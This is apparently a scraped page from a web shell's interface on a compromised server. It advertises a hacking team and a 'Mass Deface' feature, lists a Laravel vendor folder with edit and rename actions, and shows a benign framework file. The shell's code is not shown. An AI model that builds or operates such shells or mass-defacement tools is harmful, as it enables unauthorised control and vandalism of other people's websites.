webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Mail
/
Mailables
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Address.php
0.54KB
edt
ren
Attachment.php
0.177KB
edt
ren
Content.php
3.035KB
edt
ren
Envelope.php
8.85KB
edt
ren
Headers.php
1.981KB
edt
ren
<?php namespace Illuminate\Mail\Mailables; class Address { /** * The recipient's email address. * * @var string */ public $address; /** * The recipient's name. * * @var string|null */ public $name; /** * Create a new address instance. * * @param string $address * @param string|null $name * @return void */ public function __construct(string $address, string $name = null) { $this->address = $address; $this->name = $name; } }